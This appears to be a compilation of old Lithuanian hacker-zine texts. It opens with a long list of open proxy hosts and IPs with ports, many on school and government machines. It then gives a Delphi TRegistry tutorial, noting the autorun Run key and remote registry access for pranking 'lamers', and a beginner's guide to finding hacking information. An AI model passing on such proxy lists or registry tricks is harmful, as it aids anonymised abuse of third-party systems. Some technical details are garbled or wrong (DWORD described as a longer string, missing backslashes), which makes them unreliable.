hal.calc.k12.la.us 8080

koa.iolani.honolulu.hi.us 80

mcoeftp.marin.k12.ca.us 80

numbers.tvcc.cc.or.us 80

oakweb.oak-web.washington-ch.oh.u 8080

pc103.portage.k12.mi.us 80

proxy1.cdesd.k12.or.us 80

proxy2.prescott.guilford.k12.nc.us 80

thor.ircc.cc.fl.us 80

watcher.state.wy.us 80

proxy1.prescott.guilford.k12.nc.us 80

www.cassvillesd.k12.wi.us 80

-=VE – VENEZUELA=-

proxy.telcel.net.ve 80

-=ZA – SOUTH AFRICA=-

cache.mailnet.co.za 80

ns2.quickvoice.co.za 80

proxy-rnb2.mweb.co.za 80

proxy.cpt.mweb.co.za 80

proxy.pta.mweb.co.za 80

-=ZW – ZIMBABWE=-

proxy.africaonline.co.zw 8080

-=IP – Servers listed by IP=-

12.7.130.33 8080

142.169.242.4 80

164.124.250.226 80

165.138.113.102 8080

165.138.113.221 8080

165.138.113.247 8080

165.138.94.10 8080

165.254.186.2 8080

168.126.72.10 80

12.7.130.33 8080

142.169.242.4 80

164.124.250.226 80

165.138.113.102 8080

165.138.113.221 8080

165.138.113.247 8080

165.138.94.10 8080

165.254.186.2 8080

168.126.72.10 80

168.126.72.12 80

168.126.72.13 80

168.126.72.26 80

168.216.147.130 80

169.133.1.51 80

192.117.238.94 80

193.89.27.199 80

194.133.122.44 8080

194.140.17.130 80

194.213.91.6 80

194.239.178.252 80

194.51.96.231 8080

195.37.223.225 80

195.74.0.28 80

198.161.26.2 80

198.161.26.33 80

198.161.26.65 80

199.172.226.197 8080

200.1.161.59 80

202.235.15.34 8080

202.30.245.3 80

202.39.143.5 80

203.103.174.194 80

203.108.181.62 80

203.144.250.66 80

203.241.162.32 80

203.37.184.60 80

203.41.7.130 80

204.140.188.5 80

204.211.154.142 80

204.211.154.144 80

205.134.211.44 80

208.196.150.4 80

209.121.142.2 80

209.20.42.6 3128

209.5.107.10 80

210.172.76.30 80

210.8.56.1 80

210.96.52.1 80

42. REGISTRAS

Taigi pradedame:

Kaip jus tikriausiai jau zhinote registre visos Windows programos (net ir patys windowsai) ishsaugo savo kaikuriuos parametrus. Tachiau, kaip tos programos juos ishsaugo ???

Taigi shiame darbe ash norechiau aprashyti registro programavimo pagrindus. Stengiausi laikitys atokiau nuo tokio zhargonizmo kaijp joos rashotie laijshkuoze ir pan =:). Stengiausi, kad shis darbas butu kuo daugiau mokslinio pobudzhio.

Disklaimeris: Shi teksta parashiau grynai mokomaisiais tikslais ir neprisiimu jokios atsakomybes, jeigu naudojant shia literatura nors vienas zhmogus patirs moraliniu ar materialiniu nuostoliu.

Shis failas gali buti laisvai platinamas iki tol, kol kartu su juo bus minimas autoriaus vardas, bei jis liks nepakeistas.

Achiu.

Turinys:

1. Registras, jo struktura.

2. Pagrindiniai registro skyriai ( HKEYS ) ir ka jie reishkia.

3. Registro irashu tipai ( String, DWord, Binary ).

4. Pradedame programuoti ( Su Delphi 5 ).

5. Idomesnes registro vientos ( ten kur jus hackeriai galesite pridergti lamoms =:)

1 Registras, jo struktura.

Registras laiko duomenis hierachinio tipo „medyje” (tree). Kiekviena „shakele” medyje yra vadinama „raktu” (key). Kiekvienas toks raktas gali savyje tureti dar po kelis „raktus” arba tureti „irashus” (vadinamus „values”). Kartais netgi vien „rakto” buvimas tam tikroje vietoje yra visa informacija kuria reikia pasiimti programai; kita karta, programa atidaro tam tikra rakta ir pasiima informacija ish irashu esanchiu tame rakte. Vienas raktas gali tureti neribojama kieki irashu, ir irashas gali tureti bet kokia reikshme.

2 Pagrindiniai registro skyriai ( HKEYS ) ir ka jei reishkia.

Turbut pastebejote kaireje registro lango puseje yra 6 didelemis raidemis pavaidnti skyriai ir visi jie prasideda 4 raidemis HKEY_…. na tai patys aukshchiausieji registro hierarchijos skyriai (neiskaitykite My Computer, nes jame nera nieko irashyta). Kiekvienas ish ju turi savo paskirti registr, kiekviename ish ju saugoma tam tikra informacija: viename programos saugo savo nustatymus, kitame sistema (Windows), dar kitame vartotojo nustatymai ir t.t. ir pan.

Taigi chia rashoma, ka kiekvienas skyrius reishkia ir ka jis savyje „saugo”:

HKEY_CLASSES_ROOT: Shiame skyriuje yra saugomi dokumentu tipai (arba klases) ir tu dokumentu savybes susijusios su tu dokumentu tipais. Taip pat nustatymai saugomi shiame skyriuje yra naudojami Windows programu be OLE programu (gal kas nors man parashykite ka tai reishkia).

HKEY_CURRENT_USER: Shiame skyriuje yra saugomi konkretaus vartotojo nustatymai. Shie nustatymai taip pat iskaito ir Windows shell’o kintamuosius, irashus apie programu grupes, splavas, spausdintuvus, tinklo sujungimus, ir programu nustatymus.

HKEY_LOCAL_MACHINE: Shis skyrius saugo fizine kompo bukle, iskaitant duomenis apie kompo magistrale, sistemine atminti, bei instaliuota hardwara ir softwara.

HKEY_USERS: Na shiame skyriuje yra saugoma bendri vartotojo nustatymai, jeigu kompu naudojasi keli zhmones ir atsiranda dar vienas naujas vartotojas.

HKEY_CURRENT_CONFIG: Shitas skyrius yra skirtas saugoti dabartiniam aplinkos sukonfiguravimui ( fontai, interneto nustatymai ir t.t. ir pan.)

HKEY_DYN_DATA: Shitas skyrius saugo tai, ko ash dar neishsiaishkinau =:( sorry…

3. Registro irashu tipai.

STRING: Irashas, kuriame saugoma informacija yra zhodine. Tai gali buti visokie zhodzhiai, keliai (paths) nurodyti iki tam tikru programu ar pagalbiniu failu, kompo pavadinimai, kam registruota programa (!) registracijos numeriai (!!!) ir t.t. ir pan.

BINARY: Irashas, kuriame saugoma informacija yra dvejetainio pavidalo, tai gali buti visokiausi kodai arba nustatymai, kuriems reikia tik dvieju reikshmiu ( 0 ir 1 arba ne ir taip ).

DWORD: Irashas panashus i STRING, tik jame informacija gali buti daug daug ilgesne.

4. Pradedame programuoti.

PASTABA: norintys padaryti ka nors su shiuo komponentu turetu tureti daugiau negu minimalius pagrindus Delphi programavime.

Na rashysiu shi skyriu remdamasis Delphi 5 programavimo kalba. Taigi… norint priversti programa ka nors irashyti i registra reikia zhinoti kokiu komponentu ji naudosis ir kokia komanda sius registrui.

Delphi aplinkoje yra TRegistry komponentas ( yra dar pora: TRegIniFile, TRegistryIniFile, tachiau TRegistry yra universaliausias). Shis komponentas yra nevizualus ir jo nera ne vienoje paleteje, taigi ji reikia isideti kaip kintamaji bei irashyti i USES sarasha. pvz.:

uses

Registry, …;

procedure lameriolauzhimas(Sender: TObject);

var

Reg: TRegistry;

Begin

Taig pazhiurime i ji giliau. Kaip ir kievienas Delphi komponentas jis turi savybes (Properties), ju yra penkios, metodus (Methods), kuriu yra labai daug, tachiau neturi „ivykiu” ??? (Events). Kiti , bet ne visi komponentai turi ivykius.

Savybes: Access, CurrentKey, CurrentPath, LazyWrite ir RootKey.

1. Access: shia savybe yra nustatomas priejimo lygis dirbant su registro raktais ir irashais.

Savybes sintakse tokia: TRegistry.Access(). Shtai visi jo parametrai:

KEY_ALL_ACCESS visishko priejimo lygis (parametru KEY_READ, KEY_WRITE ir KEY_CREATE_LINK visuma);

KEY_READ ledzhia tik nuskaityti duomenis ish tam tikro irasho ar rakto;

KEY_WRITE ledzhia tik irashyti i registra naujus raktus ir irashus;

KEY_QUERY_VALUE garantuoja prieima prie bet kokio rakto ( bet ne irasho );

KEY_ENUMERATE_SUB_KEYS shis parametras „suskaichiuoja” registro raktus bei irashus;

KEY_NOTIFY shis parametras pranesha apie raktu bei irashu pasikeitimus;

KEY_SET_VALUE ledzhia sukurti naujus irashus raktuose;

KEY_CREATE_SUB_KEY ledzhia sukuti naujus raktus ( bet ne irashus );

KEY_CREATE_LINK sukuria nuorodas i kitus raktus, irashus ar failus diske;

KEY_EXECUTE apriboja registro raktu bei irashu naudojima iki read-only rezhimo.

Shios savybes tipas yra LongWord;

2. CurrentKey: shia savybe galima nustatyti koks registro raktas yra konkrechiu momentu atidarytas. Demesio, jog operacijos programoje atliekamos su registru paveiks tiktais ta rakta kuris yra tuo momentu atidarytas OpenKey arba OpenKeyReadOnly metodu (apie juos veliau).Shios savybes tipas yra HKEY;

Shiai savybei negalima priskirti jokio reikshmes, bet ja galima panaudoti shtai taip:

Edit1.Text := Reg.CurrentKey;

3. CurrentPath: labai panashy savybe i CurrentKey, tik shiuo atveju jeigu komanda pavyksta, tai grazhintas rezultatas bus ne tik to rakto pavadinimas, bet ir kelias iki jo ( pvz.: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun =:). Shios savybes tipas yra STRING;

Kadangi shiai savybei negalima priskirti jokio reikshmes tai ja galima pritaikyti shitaip:

Edit1.Text := Reg.CurrentPath;

4. LazyWrite: na shi savybe yra itin gera, kai jus nenorite atidarineti kitu registro raktu ir padaryti irasha registre reikiamoje vietoje… t.y. jums nereikia atidarineti raktu tiesiog pasakete programai, jog norite tokio irasho tokioje vietoje ir viskas (ankschiau minejau, jog irashus galima daryti tik ten kur yra atidaryti raktai, dabar „tik ten” pakeiskite i „beveik tik ten” =:). Shios savybes tipas yra BOOLEAN (mano megiamiausias, kas taip o kas nea ??? =:).

Sintakse: Reg.LazyWrite := True;

5. RootKey: nurodo kuris aukshchiausias hierarchijos lygis turetu buti atidarytas ( pagal nutylejima: HKEY_CURRENT_USER );

Sintakse: Reg.RootKey := HKEY_CURRENT_USER;

Dabar visi shio komponento metodai (abeceles tvarka):

CloseKey: uzhdaro esamu momentu atidaryta rakta, kai visos reikalingos „proceduros” atliko savo darba su juo.

Sintakse: Reg.CloseKey;

Create: pats svarbiausias metodas. Sukuria pati TRegistry komponenta programoje. Pradines savybes bei parametrai buna shie:

RootKey := HKEY_CURRENT_USER (kaip ir pagal nutylejima), LazyWrite := True, dar galima nurodyti AAccess parametra, kuris bus priskiriamas Access savybei, pagal nutylejima jis yra KEY_ALL_ACCESS.

Sintakse: Reg.Create(AAccess); //parametro AAccess gali ir nebuti

CreateKey: sukuria nauja rakta. Shio rakto struktura gali buti absoliuti ir releatyvi. Skirtumas: absoliutus rakto vardas prasideda backslachu „” ir yra pradedamas kurti nuo TRegistry.RootKey reikshmes, o releatyvus yra pradedamas kurti nuo konkrechiu momentu atidaryto rakto.

Sintakse: Reg.CreateKey(rakto_vardas);

DeleteKey: ishtrina nurodyta rakta. PASTABA: Windows95 operaciineje sistemoje DeletKey metodas ishtrina visus raktus esanchius tame rakte (jeigu supratote tai gerai), o WindowsNT 4.0 OS tai kiekvienam raktui reikia kviesti atskira DeleteKey metoda (tas turbut labai uzhknistu).

Sintakse: Reg.DeleteKey(rakto_vardas);

DeleteValue: ishtrina nurodyta irasha (bet ne rakta).

Sintakse: Reg.DeleteValue(irasho_vardas).

Destroy: labai jau zhiaurus metodas. Uzhdaro konkretu rakta ir sunaikina TRegistry komponenta programoje ishlaisvindamas atminti, kuri buvo skirta TRegistry komponentui programoje.

Sintakse: Reg.Destroy; (jau girdzhiu laidotuviu marsha – cirkas baigesi =:).

GetDataInfo: gauna irasho (!) registre informacija.

Sintakse: Reg.GetDataInfo(irasho_vardas,irasho tipas{deja ji turesite irashyti patys});

Kadangi shiuo metodu jus tikrinsite registro irasho tipa, tai grazhintas rezultatas yra arba True arba False;

Galimi tipai:

rdUnknown: nezhinomas registro irahso tipas;

rdString: registro irashas yra papraschiausias ANSI irashas.

rdExpandString: registro irashas yra taip pat ANSI tipo. Shis tipas saugo WinShell’o kintamuosius arba nuorodas i kitu registro irashus arba WinShell’o failus.

rdInteger: irashas yra papraschiausias 32bit skaichius.

rdBinary: irashe saugoma informacija yra dvejetainiame pavidale (10011100020MB100011010101010 =:)

GetDataSize: nustato irasho dydi baitais atidarytame rakte. Jeigu shi operacija pavyksta, tai funkcija parodo irasho dydi baitais, jeigu ne tai parodytas skaichius yra -1.

Sintakse: Reg.GetDataSize(irasho_vardas).

GetDataType: o chia tai metodas (!). Parodo irasho tipa (jums jau nebereikes nustatineti jo su GetDataInfo metodu) konkrechiu momentu atidarytame rakte. Irasho tipai tokie patys kaip ir GetDataInfo metode.

Sintakse: Reg.GetDataType(irasho_vardas).

PASTABA: Prie visu Delphi tipu esanchiu kodo pradchioje reikia nurodyti TRegDataType parametrus:

type TRegsDataType= (rdUnknown, rdString, rdExpandString, rdInteger, rdBinary);

GetKeyInfo: pateikia informacija apie konkretu atidaryta rakta. Kaip ir GetDataType kodo pradzhioje reikes irashyti TGetKeyInfo parametrus:

type

TRegKeyInfo = record

NumSubKeys: Integer;

MaxSubKeyLen: Integer;

NumValues: Integer;

MaxValueLen: Integer;

MaxDataLen: Integer;

FileTime: TFileTime;

end;

Funkcijos sintakse tokia: Reg.GetKeyInfo(norimas_parametras);

Shio metodo parametrai:

NumSubKeys: nurodo raktu skaichiu esanchiu atidarytame rakte;

MaxSubKeyLen: ilgiausia rakto varda simboliais;

NumValues: irashu skaichius;

MaxValuelen: ilgiausio irasho vardas;

MaxDataLen: ilgiausia irasho reikshme;

FileTime: laikas, kai paskutini karta buvo rashoma i nagrinejamaji rakta;

Jeigu shi funkcija nepavyksta, tai visoms reikshmems suteikiama reikshme lygi 0.

GetKeyNames: pateikia sarasha visu raktu esanchiu nurodytame rakte. Sarashas pateikiamas TStrings tipo kintamaisiais (t.y. jus neikishite shito sarasho i TListBox komponenta).

Sintakse: Reg.GetKeyNames(vieta_kur_parodyti_sarasha);

GetValueNames: labai panashi i GetKeyNames metoda, bet shi funkcija pateikia irashu sarasha. Sarashas taip pat pateikiamas TStrings tipo kintamaisiais.

Sintakse: Reg.GetValueNames(vieta_kur_parodyti_sarasha);

HasSubKeys: nustato ar konkretus raktas turi raktu savyje.

Sintakse: Reg.HasSubKeys := True; //shio metodo paramtero tipas yra BOOLEAN

KeyExists: nustato ar nurodytas raktas egzistuoja.

Sintakse: Reg.KeyExists := True; //tipas – BOOLEAN

LoadKey: sukuria nauja rakta po vienu ish aukshchiausiu raktu ir uzhkrauna i ji informacija ish nurodyto failo.

Sintakse: Reg.LoadKey(rakto_pavadinimas, failo_vardas);

PASTABA: priesh naudojant shi metoda RootKey turi buti priskirtas HKEY_USERS arb HKEY_LOCAL_MACHINE.

MoveKey: perkelia visus rakto porakchius bei irashus i kita vieta suteikiant jam nauja varda, beje reikia nurodyti dar ar reikia senaji rakta ishtrinti ar nea.

Sintakse: Reg.MoveKey(senas_rakto_vardas, naujas_rakto_vardas, ishtrinti(true arba false));

Po kopijavimo ar perkelimo naujasis raktas yra uzhdaromas. Po Windows NT kiekvienas rakto poraktis turi buti atskirai nukopijuotas arba perkeltas.

OpenKey: atidaro nurodyta rakta.

Sintakse: Reg.OpenKey(rakto_vardas, sukurti(true arba false));

Gali buti atveju, kad nurodytas raktas neegzistuos, tada „sukurti” parametro vietoje irashysime true.

Jeigu mes norime atidaryti rakta nustatymu nuskaitymui programoje, tai naudosime „sukurti” parametra false reikshme, nes mes jug nenoresime per nauja shi rakta sukurti.

OpenKeyReadOnly: atidaro nurodyta rakta vien skaitymui (!). Atidaryto rakto saugumo lygis bus KEY_READ.

Sintakse: Reg.OpenKeyReadOnly(rakto_vardas);

ReadBinaryData: nuskaito dvejetaine informacija ish nurodyto irasho.

Sintakse: Reg.ReadBinaryData(irasho_vardas, kintamasis, buferio_dydis);

Chia kintamasis yra programos kintamasis, kuriam reikes priskirti gauta reikshme, buferio_dydis yra skaichius, kuris nurodo atminties dydi baitais, kurioje bus laikoma „ishtraukta” informacija.

ReadBool: nuskaito logine informacija ish nurodyto irasho.

Sintakse: Reg.ReadBool(irasho_vardas);

Jeigu funkcija sekminga, tai jus gaunate reikalinga informacija ish registro, jeigu nea, tai jus gaunate praneshima apie klaida.

ReadCurrency: na nebijokite, tai tikrai nevaliuta, bet ash pac dar neishsiaishkinau, kad chia per metodas sorry.

ReadDate: nuskaito data ish nurodyto irasho.

Sintakse: Reg.ReadDate(irasho_vardas);

Naudokite shi metoda, tada, kai i irasha irashete reikshme su WriteDate procedure(apie tai veliau). Jeigu irashas nesaugo savyje reikshmes „panashios” i data, tai tada yra parodomas praneshimas apie klaida.

ReadDateTime: panashi i ReadDate, tik be datos ji dar nuskaito ir laika. Salygos tokios pachio sintakse tokia pati.

ReadFloat: nuskaito slankaus kablelio skaichiu. Jeigu irashas neturi savyje tokio skaichiaus yra parodomas praneshimas apie klaida.

Sintakse: Reg.ReadFloat(irasho_vardas);

ReadInteger: nuskaito skaichiu Integer tipo. Salygos bei sintakse tokia pati kaip ir pas ReadFloat.

ReadString: nuskaito simbolius (zhodzhius) ish nurodyto irasho. Shis metodas tinka tada, kai irashas buvo padarytas WriteString arba WriteExpandString metodu (apie juos veliau).

Sintakse: Reg.ReadString(irasho_vardas);

ReadTime: nuskaito laika ish registro irasho. Naudokite shi metoda tik tada, kai irasha padarete WriteTime metodu (apie ji veliau).

Sintakse: Reg.ReadTime(irasho_vardas);

RegistryConnect: kvepia hackinimu. Taip ir yra. Shi komanda prisijungia prie kito kompo registro.

Sintakse: Reg.Registry.Connect(//kompo_vardas);

PASTABA: priesh naudojantis shiuo metodu reikia RootKey savybe priskirti prei HKEY_USER arba HKEY_LOCAL_MACHINE.

RenameValue: shis metodas pakeichia irashui priskirta reikshme i nauja.

Sintakse: Reg.RenameValue(sena_reikshme, nauja_reikshme)

PASTABA, jeigu jus pervardinsite viena irasho tipa i kita, tai jums nebus jokio ispejimo ir jis bus pakeistas (!).

ReplaceKey: pakeichia vien rakta kitu ish naujo failo, senaji irashydamas i kita faila.

Sintakse: Reg.ReplaceKey(rakto_vardas, failas_i_kuri_bus_perrashytas_raktas, failas_ish_kurio_bus_irashytas_naujas_raktas);

SVARBI PASTABA: failas_i_kuri_bus_perrashytas_raktas turi buti padarytas su metodu SaveKey, kurio sintakse yra sekanti:

Reg.SaveKey(rakto_vardas, failo_pavadinimas_su_reg_pletiniu);

Taigi bendra ReplaceKey sintakse butu kazhkas panashaus i:

Reg.Replacekey(rakto_vardas,SaveKey(rakto_vardas,failo_pavadinimas_su_reg_pletiniu),failas_ish_kurio_bus_irashytas_naujas_raktas);

RestoreKey: metodas kuris atkuria rakta ish failo ankschiau sukurto su SaveKey metodu.

Bendra sintakse: Reg.RestoreKey(rakto_vardas, SaveKey(failas_ish_kurio_bus_atgamintas_raktas));

SaveKey: na jau anskchiau minejau, kad tai metodas, kurio yra atidaromas vienas ish raktu ir ishsaugomas i konkretu faila su pletiniu *.reg.

UnLoadKey: ishkrauna viena ar kita rakta ish registro nemodifikuodamas failo (jeigu toks yra) ish kurio tas raktas buvo uzhkrautas LoadKey metodu. Priesh naudojant shia funkcija RootKey savybe turi buti nustatyta i HKEY_USERS arba HKEY_LOCAL_MACHINE.

Sintakse: Reg.UnLoadKey(rakto_vardas);

ValueExists: tikrina ar nurodytas irashas egzistuoja registre. Tipas BOOLEAN.

Sintakse: Reg.ValueExists(irasho_vardas);

WriteBinaryData: padaro irasha nurodytu vardu dvejetainio tipo. T.y. jame saugoma informacija yra dvejetainiame pavidale.

Sintakse: Reg.WriteBinaryData(irasho_vardas, kintamasis, buferio_dydis);

Visi kiti parametrai(kintamasis, buferio dydis) yra apzhvelgiami metode ReadBinaryData.

WriteBool: padaro irasha nurodytu vardu loginio tipo (True, False), nors i registre irashas yra padaromas kaip dvejetainio tipo. Jeigu shi funkcija nepavyksta jokie irashai nera padaromi registre ir yra parodomas praneshimas apie klaida.

Sintakse: Reg.WriteBool(irasho_vardas, true/false);

WriteCurrency: nu jug sakiau, kad nezhinau ka reishkia ReadCurrency, tai nezhinau ka reishkia ir shitas metodas.

WriteDate: padaro irasha, kurio reikshme yra data.

Sintakse: Reg.WriteDate(irasho_vardas, reikshme);

Reikshme yra TDateTime tipo kintamasis. Galimos kintamojo reikshmes:

0 – laikas bus pradetas skaichiuoti nuo 1899 12 30 12:00 vidurdieni.

2.75 – laikas bus pradetas skaichiuoti nuo 1900 01 01 6:00 vakare.

-1.25 – laikas bus pradetas skaichiuoti nuo 1899 12 29 6:00 ryte.

35065 – laikas bus pradetas skaichiuoti nuo 1996 01 01 12:00.

WriteDateTime: padaro irasha, kurio reikshme yra laikas.

Sintakse: Reg.WriteDateTime(irasho_vardas, reikshme);

Reikshme yra TDateTime tipo kintamasis. Kintamojo reikshmes yra tokios pachios tiktais shiuo atveju procedura data irasho ir laika ir data.

WriteExpandString: padaro irasha kuris nukreipia i kitus sistemos kintamuosius, failus arba registro irashus.

Sintakse: Reg.WriteExpandString(irasho_vardas, reikshme);

Reikshme chia yra paprastas „kelias” iki vieno ar kito kintamojo ar failo sistemoje ir pan.

WriteFloat: padaro irasha su slankaus kablelio skaichiumi. Tokiu pvz kaip pi:=3.1415296 arba 1 inch := 2.54 cm ir t.t. ir pan.

Sintakse: Reg.WriteFloat(irasho_vardas, reikshme);

Reikshme yra skaichius kuri jus norite irashyti. Shi irasha jus veliau galite „nuskaityti” su ReadFloat metodu.

WriteInteger: padaro irasha su sveikuoju skaichiumi. Shi irasha jus veliau galite „nuskaityti” su ReadInteger metodu.

Sintakse: Reg.WriteInteger(irasho_vardas, reishme);

Reikshme – jusu norimas skaichius.

WriteString: padaro irasha su simbliu reikshme (zhodzhiais). Shi irasha jus veliau galite „nuskaityti” su ReadInteger metodu.

Sintakse: Reg.WriteString(irasho_vardas, reikshme);

Na nebeaishkinsiu ka reishkia reikshme =:).

WriteTime: padaro irasha, kurio reikshme yra laikas. Viskas tas pats kaip ir WriteDate ar WriteDateTime, tik dabar jum padarys irasha, kuriame yra tik (!) data.

Shtai visi TRegistry komponento metodai bei savybes. Ash nenorejau jums rashyti „paspausk chia, rashyk taip”. Ash jums trumpai apibudinau kiekviena savybe bei metoda, tikiuosi su jais zhinosite ka daryti ir padarysite keliu savybiu bei metodu „mirtina jungini” =:).

5. Idomiausios vietos registre:

HKEY_CURRENT_USERSoftwareMicrosoftNotepad

HKEY_CURRENT_USERSoftwareMicrosoftTelnet

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerFileExts (visi failu pletiniai ir su kuo jie turetu buti atidaromi)

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerShell Folders (windozu katalogu tokiu kaip Favorites Templates Startup ir t.t. keliai (paths) windozu kataloge =:)~ skanu…

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell Folders (vartotojo shell katalogai).

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionGrpConvMapGroups (kazhkas panashaus i Startmenu katalogus bei taskbar quick launch konfiguracija)

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones (viskas kas susije su Desktop ikonomis tokiomis kaip My Computer, NetWork neighborhood ir pan.

HKEY_LOCAL_MACHINESOFTWARECLASSESCLSID{645FF040-5081-101B-9F08-00AA002F954E} (chia galite pakeisti savo shiukshliu dezhes pavadinima ir apibudinima).

6. Naudota literatura: Delphi 5 help failas. Registra ishnarshiau pats.

Tikiuosi patiks.

Sekantis planuojamas darbas turetu buti apie komponentu rashyma (taip par Delphi aplinkoje).

Bloody yours 20MB1 =:)

43. KUR PRADEDANCZIAJAM HACKERIUI IESKOTI INFO?

REM: Shis textas skirtas pradedantiesiems ir naujokams technologiniame pogrindyje. Todel, please, j00s, visi kieti s00per 31337 hackeriai lameriais?’, etc. 🙂

Visi mes kazhkada tokiais buvome. Juk reikia nuo kazhko pradeti 🙂

H/P kanaluose IRC, mailing-list’uose ir newsgroup’uose gan dazhnai tenka matyti pradedancziuju ir wannabe hackeriu klausimus tipo „Kaip tapti hackeriu?”, „Kaip isilauzhti i sistema?”, etc. Ir jeigu tokiu klausimu autorius nera ishjuokiamas (kas dazhniausiai ir atsitinka), tai vienintelis atsakymas, kurio jis gali susilaukti – „RTFM!”

Tiems, kas nesupranta paaishkinsiu: RTFM – tai anglishkos frazes

‘Read The Fuckin’ Manual’ sutrumpinimas. Taigi, lietuvishkai tai skambetu mazhdaug ‘Skaityk !@#$%^ instrukcija!’.

Bet kur, po velniu, tas instrukcijas gauti?

Vienas ish hackeriu etikos teiginiu skelbia – neprashyk kitu tokios informacijos, kuria pats gali susirasti. Taigi, netgi jeigu jums vis delto pasiseke ir kazhkas ish hackeriu nutare jums padeti – jis greicziausia pasufleruos, kur ieshkoti informacijos, bet visa kita jums teks daryti patiems: dirbkite savo galva, mastykite, darykite ishvadas.

O shiame tekstuke ash pameginau apibendrinti, kaip ir kur jums susirasti tai, ko ieshkote.

Visu pirma – heh, mokykites kalbu. Jeigu be gimtosios lietuviu galite laisvai (na beveik :] ) skaityti anglishkai ir rusishkai – jau turite visus shansus susirasti faktishkai bet kokia info, nes, kaip zhinote,

Interneto kalba yra anglu, o dauguma specializuotu kompiuteriniu knygu musu knyginuose yra rusu kalba.

Pirkite rimtas knygas apie kompiuterius: operaciniu sistemu, protokolu, programavimo kalbu aprashymus, zhinynus, vadovelius, knygas, susijusias su kompiuteriu saugumu. Ishsiaishkinkite kur jusu mieste yra technines literaturos knygynas (Kaune siulycziau uzheiti i Smaltijos knygyna Kestucio gatveje prieshais Raudonojo Kryzhiaus ligonine; Vilniuje – Penkiu

Kontinentu knygyna ir kt.) ir pinigus, kuriuos paprastai praoshiate savaitgalio fiestose investuokite i geras knygas. SKAITYKITE nupirktas knygas – shiaip skaitymas atima gana daug laiko, bet, pasistengus, laiko skaitymui galima surasti – skaitykite troleibuse, automobilyje pakliuve i kamshti, laukdami priemimo pas daktara ar kirpykloje, guledami vonioje (heh) ar netgi per pamokas ar paskaitas (kai kurios ju ishtikruju nobodzhios, ar ne?). Taigi, RTFM!

Nueikite i Technikos biblioteka arba i vieshaja biblioteka ir panarshykite kataloga kompiuterinem temom: kompiuteriai, informatika, informacijos saugumas, programavimo kalbos, informacines technologijos, telekomunikacijos, etc. RTFM!

Knygos yra gerai, bet jos turi viena esmini trukuma – geros knygos apie kompiuterius kainuoja nemazhus pinigus (pazhistu zhmoniu, kurie ishleidzhia knygoms po 300 – 400 Lt per menesi) Tuo tarpu, beveik visa jums reikalinga informacija galima gauti nemokamai – taip, teisingai, ish

Interneto.

Lengviausiais budas – pasitelkti i pagalba paieshkos stotis (search

Web’a, kitos – newsgroup’u archyvus, kur saugoma viskas, kas buvo ten postinta per kelis metus. Taip pat Internete saugomi geriausiu hackeriu maillist’u archyvai.

Naudojantis paieshkos stotimis yra du svarbus dalykai, i kuriuos reiktu atkreipti demesi: kokia paieshkos stotimi naudotis, ir kokia paieshkos taktika remtis.

Mano asmenine nuomone, geriausios paieshkos stotys yra dvi: Web’ui –

Altavista (http://altavista.digital.com arba http://www.av.com), o newsgroup’ams – Dejanews (http://www.dejanews.com), bet jus galite ishsirinkti sau patogiausia paieshkos stoti: linkus i beveik visas galite rasti adresu http://sgk.tiac.net/search/

Bet kaip efektyviausiai pasinaudoti paieshkus stocziu siuloma paslauga?

Tiesog ivedus i paieshkos lauka zhodi „hacker” ar netgi „how to hack” jus gausite brashkilijonus nuorodu i webo puslapius, kur rasite pretenzinga grafika su kaukolem ir liepsnom, vargonu muzika bei su gramatinem klaidom parashytus teiginius „Ash, ble, kietaz haxoriuz, taigi joos lamai, turite bucziuoti man su@ine, nes ash esu pi%$dec ELITAS!” ir kruvom nuorodu i tokius pat puslapius. Tacziau juose kazhkaip nelebai yra naudingos informacijos. Heh, sveiki atvyke i wanabe-hackeriu pasauli 😉

Taigi, pirmoji taisykle – sukonkretinkite savo paieshka. Rashykite ne „how to hack”, bet kazhka panashaus i „password attacks over NetBIOS”

Antra – naudokite „advanced search” opcija, kuri leistu naudoti matematines logikos taisykles paieshkos sukonkretinimui. (Matematines logikos funkcijos „and”-ir, „or”-arba „not”-ne pades zhymiai susiaurinti paieshkos rezultatus atsizhvelgiant i jusu poreikius. Smulkiau apie matematines logikos funkcijas pasiskaitykite vadovelyje, o czia ash tik trumpai apzhvelgsiu ju panaudojima paieshkai.)

„And” funkcija duos tik tuos rezultatus, kurie atitinka VISUS jusu uzhklausimo zhodzhius. Shi funkcija tapati opcijai „all”.

„Or” – visus kurie atitinka BENT VIENA uzhklausimo zhodi. Shi funkcija tapati opcijai „any”.

„Not” – rezultatai, kurie atitinka shioje skilty irashyta uzhklausima bus ignoruojami.

Be paieshkos stocziu yra dar vienas geras budas rasti geras vieteles

Internete: aptikus gera saita, tiesiog sekti ten esancziais linkais (nuorodom), ir jums nereikes patiems knistis po tukstanczius paieshkos stocziu ishmestu rezultatu, nes kazhkas galbut jau padare tai uzh jus.

Keletas pavyzdzhiu:

anglishkai (tik keli ish daaaugelio pvz.):

http://www.cert.org http://www.silitoad.org http://www.rootshell.com rusishkai:

http://www.hackzone.ru (geriausias hack’ saitas rusu kalba)

lietuvishkai:

http://www.pogrindis.net (heh)

Vienas asmeninis patarimas: narshydami puslapius ishjunkite visas multimedia opcijas savo browseryje, arba naudokite txt-only browserius tipo Lynx. Jums juk reikia INFORMACIJOS, ir jus nenorite gaishti laiko, kol krausis visi tie JPG su kaukolem ir animuotom liepsnom backgrounde 🙂

bei shustros muzikeles.

Taigi, rimtuose H/P puslapiuose jus galesite rasti textuku, krie yra parashyti hackeriu ir dazhnai buna labai informatyvus. Ypacz vadinamieji

FAQ (Frequently Asked Questions) – Dazhniausia Uzhduodami Klausimai (ir atsakymai). Tacziau, tushczias textu kolekcionavimas neduos jokios naudos.

Skaitykite juos. RTFM!

Na o kaip gi del manual’u? Juk tam, kad ‘..isilauzhti i sistema’ jums, visu pirma reikia tureti nebloga zhiniu bagazha apie tai, kaip tos sistemos veikia, apie protokolus ir tinklus, etc.

GERIAUSIAS, taip, geriausias shaltinis shiuo atzhvilgiu yra RFC.

RFC reishkia „Request for Comment” – „Uzhklausimas komentarui”. Shis pavadinimas kiles dar ish tu laiku, kai kompiutriu tinklai buvo kudikystes stadijoje, ir entuziastai faktishkai kure interneta. Tacziau dabar RFC –

